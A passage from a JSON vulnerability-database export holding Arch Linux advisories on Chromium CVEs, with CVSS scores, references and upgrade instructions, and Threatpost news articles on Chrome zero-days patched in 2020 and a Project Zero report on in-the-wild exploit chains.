the\nChromium browser.\n\n- CVE-2017-5072 (content spoofing)\n\nAn address spoofing flaw has been found in the Omnibox component of the\nChromium browser.\n\n- CVE-2017-5073 (arbitrary code execution)\n\nA use-after-free flaw has been found in the print preview component of\nthe Chromium browser.\n\n- CVE-2017-5074 (arbitrary code execution)\n\nA use-after-free flaw has been found in the Apps Bluetooth component of\nthe Chromium browser.\n\n- CVE-2017-5075 (information disclosure)\n\nAn information leak flaw has been found in the CSP reporting component\nof the Chromium browser.\n\n- CVE-2017-5076 (content spoofing)\n\nAn address spoofing flaw has been found in the Omnibox component of the\nChromium browser.\n\n- CVE-2017-5077 (arbitrary code execution)\n\nA heap buffer overflow flaw was found in the Skia component of the\nChromium browser.\n\n- CVE-2017-5078 (arbitrary command execution)\n\nA possible command injection flaw has been found in the mailto handling\ncomponent of the Chromium browser.\n\n- CVE-2017-5079 (content spoofing)\n\nA UI spoofing flaw has been found in the Blink component of the\nChromium browser.\n\n- CVE-2017-5080 (arbitrary code execution)\n\nA use-after-free flaw has been found in the credit card autofill\ncomponent of the Chromium browser.\n\n- CVE-2017-5081 (authentication bypass)\n\nA extension verification bypass has been found in the Chromium browser.\n\n- CVE-2017-5082 (insufficient validation)\n\nAn insufficient hardening flaw has been found in the credit card editor\ncomponent of the Chromium browser.\n\n- CVE-2017-5083 (content spoofing)\n\nA UI spoofing flaw has been found in the Blink component of the\nChromium browser.\n\n- CVE-2017-5085 (cross-site scripting)\n\nA security issue has been found in the Chromium browser, where\njavascript is inappropriately executed on WebUI pages\n\n- CVE-2017-5086 (content spoofing)\n\nAn address spoofing flaw has been found in the Omnibox component of the\nChromium browser.\n\nImpact\n======\n\nA remote attacker can access sensitive information, spoof content,\nbypass security measures and execute arbitrary code and commands on the\naffected host.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=722756\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=715582\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=709417\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=716474\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=700040\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=678776\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=719199\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=716311\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=711020\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=713686\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=708819\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=672008\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=721579\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=714849\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=692378\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=722639\nhttps://security.archlinux.org/CVE-2017-5070\nhttps://security.archlinux.org/CVE-2017-5071\nhttps://security.archlinux.org/CVE-2017-5072\nhttps://security.archlinux.org/CVE-2017-5073\nhttps://security.archlinux.org/CVE-2017-5074\nhttps://security.archlinux.org/CVE-2017-5075\nhttps://security.archlinux.org/CVE-2017-5076\nhttps://security.archlinux.org/CVE-2017-5077\nhttps://security.archlinux.org/CVE-2017-5078\nhttps://security.archlinux.org/CVE-2017-5079\nhttps://security.archlinux.org/CVE-2017-5080\nhttps://security.archlinux.org/CVE-2017-5081\nhttps://security.archlinux.org/CVE-2017-5082\nhttps://security.archlinux.org/CVE-2017-5083\nhttps://security.archlinux.org/CVE-2017-5085\nhttps://security.archlinux.org/CVE-2017-5086", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-07T00:00:00", "type": "archlinux", "title": "[ASA-201706-8] chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2017-06-07T00:00:00", "id": "ASA-201706-8", "href": "https://security.archlinux.org/ASA-201706-8", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T16:34:04", "description": "Arch Linux Security Advisory ASA-201902-3\n=========================================\n\nSeverity: Critical\nDate : 2019-02-11\nCVE-ID : CVE-2019-5754 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761\nCVE-2019-5762 CVE-2019-5763 CVE-2019-5764 CVE-2019-5765\nCVE-2019-5766 CVE-2019-5767 CVE-2019-5768 CVE-2019-5769\nCVE-2019-5770 CVE-2019-5771 CVE-2019-5772 CVE-2019-5773\nCVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781\nCVE-2019-5782 CVE-2019-5783\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-861\n\nSummary\n=======\n\nThe package chromium before version 72.0.3626.81-1 is vulnerable to\nmultiple issues including arbitrary code execution, access restriction\nbypass, content spoofing and insufficient validation.\n\nResolution\n==========\n\nUpgrade to 72.0.3626.81-1.\n\n# pacman -Syu \"chromium>=72.0.3626.81-1\"\n\nThe problems have been fixed upstream in version 72.0.3626.81.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2019-5754 (arbitrary code execution)\n\nA security issue has been found in the QUIC implementation of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5755 (arbitrary code execution)\n\nA security issue has been found in the V8 implementation of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5756 (arbitrary code execution)\n\nA use after free issue has been found in the PDFium component of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5757 (arbitrary code execution)\n\nA type confusion issue has been found in the SVG implementation in the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5758 (arbitrary code execution)\n\nA use after free issue has been found in the blink component of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5759 (arbitrary code execution)\n\nA use after free issue has been found in the HTML select elements\ncomponent of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5760 (arbitrary code execution)\n\nA use after free issue has been found in the WebRTC implementation in\nthe chromium browser before 72.0.3626.81.\n\n- CVE-2019-5761 (arbitrary code execution)\n\nA use after free issue has been found in the SwiftShader component of\nthe chromium browser before 72.0.3626.81.\n\n- CVE-2019-5762 (arbitrary code execution)\n\nA use after free issue has been found in the PDFium component of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5763 (arbitrary code execution)\n\nA security issue has been found in the V8 implementation of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5764 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in the WebRTC component\nof the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5765 (access restriction bypass)\n\nAn insufficient policy enforcement issue has been found in the chromium\nbrowser before 72.0.3626.81.\n\n- CVE-2019-5766 (access restriction bypass)\n\nAn insufficient policy enforcement issue has been found in the Canvas\ncomponent of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5767 (content spoofing)\n\nAn incorrect security UI issue has been found in the WebAPKs component\nof the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5768 (access restriction bypass)\n\nAn insufficient policy enforcement issue has been found in the DevTools\ncomponent of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5769 (insufficient validation)\n\nAn insufficient validation of untrusted input issue has been found in\nthe Blink component of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5770 (arbitrary code execution)\n\nA heap-based buffer overflow vulnerability has been found in the WebGL\ncomponent of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5771 (arbitrary code execution)\n\nA heap-based buffer overflow vulnerability has been found in the\nSwiftShader component of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5772 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in the PDFium component\nof the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5773 (insufficient validation)\n\nAn insufficient data validation issue has been found in the IndexedDB\ncomponent of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5774 (insufficient validation)\n\nAn insufficient validation of untrusted input issue has been found in\nthe SafeBrowsing component of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5775 (content spoofing)\n\nAn insufficient policy enforcement issue has been found in the OmniBox\ncomponent of the chromium browser before 72.0.3626.81, allowing IDN URL\nspoofing.\n\n- CVE-2019-5776 (content spoofing)\n\nAn insufficient policy enforcement issue has been found in the OmniBox\ncomponent of the chromium browser before 72.0.3626.81, allowing IDN URL\nspoofing.\n\n- CVE-2019-5777 (content spoofing)\n\nAn insufficient policy enforcement issue has been found in the OmniBox\ncomponent of the chromium browser before 72.0.3626.81, allowing IDN URL\nspoofing.\n\n- CVE-2019-5778 (access restriction bypass)\n\nAn insufficient policy enforcement issue has been found in the\nExtensions component of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5779 (access restriction bypass)\n\nAn insufficient policy enforcement issue has been found in the\nServiceWorker component of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5780 (access restriction bypass)\n\nA security issue has been found in the chromium browser before\n72.0.3626.81 leading to Insufficient policy enforcement.\n\n- CVE-2019-5781 (content spoofing)\n\nA security issue has been found in the Omnibox implementation of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5782 (arbitrary code execution)\n\nA security issue has been found in the V8 implementation of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5783 (insufficient validation)\n\nAn insufficient validation of untrusted input issue has been found in\nthe DevTools component of the chromium browser before 72.0.3626.81.\n\nImpact\n======\n\nA remote attacker can spoof the URL in the address bar, bypass security\npolicies or execute arbitrary code.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2019/01/stable-channel-update-for-desktop.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=914497\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=913296\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=895152\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=915469\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=913970\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=912211\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=912074\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=904714\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=900552\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=914731\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=913246\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=922627\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=907047\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=902427\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=805557\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=913975\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=908749\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=904265\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=908292\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=917668\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=904182\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=896722\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=863663\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=849421\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=918470\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=891697\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=896725\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=906043\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=895081\nhttps://security.archlinux.org/CVE-2019-5754\nhttps://security.archlinux.org/CVE-2019-5755\nhttps://security.archlinux.org/CVE-2019-5756\nhttps://security.archlinux.org/CVE-2019-5757\nhttps://security.archlinux.org/CVE-2019-5758\nhttps://security.archlinux.org/CVE-2019-5759\nhttps://security.archlinux.org/CVE-2019-5760\nhttps://security.archlinux.org/CVE-2019-5761\nhttps://security.archlinux.org/CVE-2019-5762\nhttps://security.archlinux.org/CVE-2019-5763\nhttps://security.archlinux.org/CVE-2019-5764\nhttps://security.archlinux.org/CVE-2019-5765\nhttps://security.archlinux.org/CVE-2019-5766\nhttps://security.archlinux.org/CVE-2019-5767\nhttps://security.archlinux.org/CVE-2019-5768\nhttps://security.archlinux.org/CVE-2019-5769\nhttps://security.archlinux.org/CVE-2019-5770\nhttps://security.archlinux.org/CVE-2019-5771\nhttps://security.archlinux.org/CVE-2019-5772\nhttps://security.archlinux.org/CVE-2019-5773\nhttps://security.archlinux.org/CVE-2019-5774\nhttps://security.archlinux.org/CVE-2019-5775\nhttps://security.archlinux.org/CVE-2019-5776\nhttps://security.archlinux.org/CVE-2019-5777\nhttps://security.archlinux.org/CVE-2019-5778\nhttps://security.archlinux.org/CVE-2019-5779\nhttps://security.archlinux.org/CVE-2019-5780\nhttps://security.archlinux.org/CVE-2019-5781\nhttps://security.archlinux.org/CVE-2019-5782\nhttps://security.archlinux.org/CVE-2019-5783", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-02-11T00:00:00", "type": "archlinux", "title": "[ASA-201902-3] chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5783"], "modified": "2019-02-11T00:00:00", "id": "ASA-201902-3", "href": "https://security.archlinux.org/ASA-201902-3", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-10-14T22:29:07", "description": "Google said Monday it has patched a Chrome web browser zero-day bug being actively exploited in the wild. The flaw affects versions of Chrome running on the Windows, macOS and Linux platforms.\n\nThe zero-day vulnerability, tracked as CVE-2020-6418, is a type of confusion bug and has a severity rating of high. Google said the flaw impacts versions of Chrome released before version 80.0.3987.122. The bug is tied to Chrome\u2019s open-source JavaScript and Web Assembly engine, called V8.\n\nTechnical details of CVE-2020-6418 are being withheld pending patch deployment to a majority of affected versions of the Chrome browser, [according to Google](<https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html>). Generally speaking, memory corruption vulnerabilities occur when memory is altered without explicit data assignments triggering programming errors, which enable an adversary to execute arbitrary code on targeted devices.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nIn the context web browser engines, a similar memory corruption bug exploited by adversaries [earlier this month](<https://threatpost.com/mozilla-firefox-73-browser-update-fixes-high-severity-rce-bugs/152831/>), enticed victims to visit a specially-crafted web site booby-trapped with and an exploit that took advantage of a browser memory corruption flaw to execute code remotely.\n\nCredited for finding the bug is Google\u2019s Threat Analysis Group and researcher Cl\u00e9ment Lecigne.\n\nGoogle is also warning users of two additional high-severity vulnerabilities. One, tracked as CVE-2020-6407, is an \u201cout of bounds memory access in streams\u201d bug. The other bug, which does not have a CVE assignment, is a flaw tied to an integer overflow in ICU, a flaw commonly associated with triggering a denial of service and possibly to code execution.\n\nMitigation includes Windows, Linux, and macOS users download and install [the latest version of Chrome](<https://support.google.com/chrome/answer/95414?co=GENIE.Platform%3DDesktop&hl=en>).\n", "cvss3": {}, "published": "2020-02-25T18:34:52", "type": "threatpost", "title": "Google Patches Chrome Browser Zero-Day Bug, Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-25T18:34:52", "id": "THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF", "href": "https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-13T17:23:32", "description": "Google researchers have detailed a major hacking campaign that was detected in early 2020, which mounted a series of sophisticated attacks, some using zero-day flaws, against [Windows](<https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/>) and [Android](<https://threatpost.com/google-warns-of-critical-android-remote-code-execution-bug/162756/>) platforms.\n\nWorking together, researchers from [Google Project Zero](<https://threatpost.com/2-zero-day-bugs-google-chrome/161160/>) and the [Google Threat Analysis Group (TAG)](<https://blog.google/threat-analysis-group/>) uncovered the attacks, which were \u201cperformed by a highly sophisticated actor,\u201d Ryan from Project Zero wrote in the [first](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>) of a six-part blog series on their research.\n\n\u201cWe discovered two exploit servers delivering different exploit chains via watering-hole attacks,\u201d he wrote. \u201cOne server targeted Windows users, the other targeted Android.\u201d\n\n[![2020 Reader Survey: Share Your Feedback to Help Us Improve](https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/18164737/Reader-Survey-Update.jpg)](<https://threatpost.com/2020-reader-survey/161168/>)\n\nWatering-hole attacks target organizations\u2019 oft-used websites and inject them with malware, infecting and gaining access to victims\u2019 machines when users visit the infected sites.\n\nIn the case of the attacks that Google researchers uncovered, attackers executed the malicious code remotely on both the Windows and Android servers using Chrome exploits. The exploits used against Windows included [zero-day](<https://threatpost.com/apple-patches-bugs-zero-days/161010/>) flaws, while Android users were targeted with exploit chains using known \u201cn-day\u201d exploits, though they acknowledge it\u2019s possible zero-day vulnerabilities could also have been used, researchers said.\n\nThe team spent months analyzing the attacks, including examining what happened [post-exploitation on Android devices.](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>) In that case, additional payloads were delivered that collected device fingerprinting information, location data, a list of running processes and a list of installed applications for the phone.\n\n## Zero-Day Bugs\n\nThe researchers posted [root-cause analyses ](<https://googleprojectzero.blogspot.com/p/rca.html>)for each of the four Windows zero-day vulnerabilities that they discovered being leveraged in their attacks.\n\nThe first, [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/cve-2020-6418-chrome-incorrect-side.html>), is a type confusion bug prior to 80.0.3987.122 leading to remote-code execution. It exists in V8 in Google Chrome (Turbofan), which is the component used for processing JavaScript code. It allows a remote attacker to potentially cause heap corruption via a crafted HTML page.\n\nThe second, [CVE-2020-0938](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0938>), is a a trivial stack-corruption vulnerability in the Windows Font Driver. It can be triggered by loading a Type 1 font that includes a specially crafted BlendDesignPositions object. In the attacks, it was chained with [CVE-2020-1020,](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1020>) another Windows Font Driver flaw, this time in the processing of the VToHOrigin PostScript font object, also triggered by loading a specially crafted Type 1 font. Both were used for privilege escalation.\n\n\u201cOn Windows 8.1 and earlier versions, the vulnerability was chained with [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1020>) (a write-what-where condition) to first set up a second stage payload in RWX kernel memory at a known address, and then jump to it through this bug,\u201d according to Google. \u201cThe exploitation process was straightforward because of the simplicity of the issue and high degree of control over the kernel stack. The bug was not exploited on Windows 10.\u201d\n\nAnd finally, [CVE-2020-1027](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1027>) is a Windows heap buffer overflow in the Client/Server Run-Time Subsystem (CSRSS), which is an essential subsystem that must be running in Windows at all times. The issue was used as a sandbox escape in a browser exploit chain using, at times, all four vulnerabilities.\n\n\u201cThis vulnerability was used in an exploit chain together with a 0-day vulnerability in Chrome (CVE-2020-6418). For older OS versions, even though they were also affected, the attacker would pair CVE-2020-6418 with a different privilege escalation exploit (CVE-2020-1020 and CVE-2020-0938).\u201d\n\nAll have all since been patched.\n\n## Advanced Capabilities\n\nFrom their understanding of the attacks, researchers said that threat actors were operating a \u201ccomplex targeting infrastructure,\u201d though, curiously, they didn\u2019t use it every time.\n\n\u201cIn some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox,\u201d according to researchers. \u201cIn these cases, the attacker took a slower approach: sending back dozens of parameters from the end user\u2019s device, before deciding whether or not to continue with further exploitation and use a sandbox escape.\u201d\n\nStill other attack scenarios showed attackers choosing to fully exploit a system straightaway; or, not attempting any exploitation at all, researchers observed. \u201cIn the time we had available before the servers were taken down, we were unable to determine what parameters determined the \u2018fast\u2019 or \u2018slow\u2019 exploitation paths,\u201d according to the post.\n\nOverall, whoever was behind the attacks designed the exploit chains to be used modularly for efficiency and flexibility, showing clear evidence that they are experts in what they do, researchers said.\n\n\u201cThey [use] well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks,\u201d according to the post.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n", "cvss3": {}, "published": "2021-01-13T16:57:39", "type": "threatpost", "title": "Sophisticated Hacks Against Android, Windows Reveal Zero-Day Trove", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"], "modified": "2021-01-13T16:57:39", "id": "THREATPOST:88098D30DA04E912B06C03B52556385C", "href": "https://threatpost.com/hacks-android-windows-zero-day/163007/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-21T12:26:16", "description": "Google released an [update](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) to its Chrome browser that patches a zero-day vulnerability in the software\u2019s FreeType font rendering library that was actively being exploited in the wild.\n\nSecurity researcher Sergei Glazunov of [Google Project Zero](<https://googleprojectzero.blogspot.com/>) discovered [the bug](<https://twitter.com/benhawkes/status/1318640422571266048>) which is classified as a type of memory-corruption flaw called a heap buffer overflow in FreeType. Glazunov informed Google of the vulnerability on Monday. Project Zero is an internal security team at the company aimed at finding zero-day vulnerabilities.\n\nBy Tuesday, Google already had released a stable channel update, Chrome version 86.0.4240.111, that deploys five security fixes for Windows, Mac & Linux\u2013among them a fix for the zero-day, which is being tracked as CVE-2020-15999 and is rated as high risk. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) \n\u201cGoogle is aware of reports that an exploit for CVE-2020-15999 exists in the wild,\u201d Prudhvikumar Bommana of the Google Chrome team wrote in a [blog post](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) announcing the update Tuesday. Google did not reveal further details of the active attacks that researchers observed.\n\n[Andrew R. Whalley](<https://twitter.com/arw>), a member of the Chrome security team, gave his team kudos on [Twitter](<https://twitter.com/arw/status/1318640817762807810>) for the \u201csuper-fast\u201d response to the zero-day.\n\nStill, Ben Hawkes, technical lead for the Project Zero team, warned that while Google researchers only observed the Chrome exploit, it\u2019s possible that other implementations of FreeType might be vulnerable as well since Google was so quick in its response to the bug. He referred users to a [fix](<https://savannah.nongnu.org/bugs/?59308>) by Glazunov posted on the FreeType Project page and urged them to update other potentially vulnerable software.\n\n\u201cThe fix is also in today\u2019s stable release of FreeType 2.10.4,\u201d Hawkes [tweeted](<https://twitter.com/benhawkes/status/1318640423485624320>).\n\nMeanwhile, security researchers took to Twitter to encourage people to update their Chrome browsers immediately to avoid falling victim to attackers aiming to exploit the flaw.\n\n\u201cMake sure you update your Chrome today! (restart it!),\u201d [tweeted](<https://twitter.com/securestep9/status/1318679358840754176>) London-based application security consultant Sam Stepanyan.\n\nIn addition to the FreeType zero day, Google patched four other bugs\u2014three of high risk and one of medium risk\u2013in the Chrome update released this week.\n\nThe high-risk vulnerabilities are: CVE-2020-16000, described as \u201cinappropriate implementation in Blink;\u201d CVE-2020-16001, described as \u201cuse after free in media;\u201d and CVE-2020-16002, described as \u201cuse after free in PDFium,\u201d according to the blog post. The medium-risk bug is being tracked as CVE-2020-16003, described as \u201cuse after free in printing,\u201d Bommana wrote.\n\nSo far in the last 12 months Google has patched three zero-day vulnerabilities in its Chrome browser. Prior to this week\u2019s FreeType disclosure, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n", "cvss3": {}, "published": "2020-10-21T12:23:29", "type": "threatpost", "title": "Google Patches Actively-Exploited Zero-Day Bug in Chrome Browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003", "CVE-2020-6418"], "modified": "2020-10-21T12:23:29", "id": "THREATPOST:6F7E512F15913694CF17A906715FE678", "href": "https://threatpost.com/google-patches-zero-day-browser/160393/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-04T20:29:51", "description": "Flaws in Google\u2019s Chrome desktop and Android-based browsers were patched Monday in an effort to prevent known exploits from being used by attackers. Two separate security bulletins issued by Google warned that it is aware of reports that exploits for both exist in the wild. Google\u2019s Project Zero went one step further and asserted that both bugs are actively being exploited.\n\nIn its [Chrome browser update](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) for Windows, Mac and Linux, Google said that version 86.0.4240.183 fixes 10 vulnerabilities. Tracked as CVE-2020-16009, this bug is the most troubling, rated high-severity and is one of the two with active exploits. The vulnerability is tied to Google\u2019s open source JavaScript and WebAssembly engine called V8. In its disclosure, the flaw is described as an \u201cinappropriate implementation in V8\u201d.\n\nClement Lecigne of Google\u2019s Threat Analysis Group and Samuel Gross of Google Project Zero discovered the Chrome desktop bug on Oct. 29, according to a [blog post](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) announcing the fixes by Prudhvikumar Bommana of the Google Chrome team. If exploited, the V8 bug can be used for remote code execution, according to a separate analysis by Project Zero\u2019s team. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nAs for the Android OS-based Chrome browser, also with an active exploit in the wild, Google warned [on 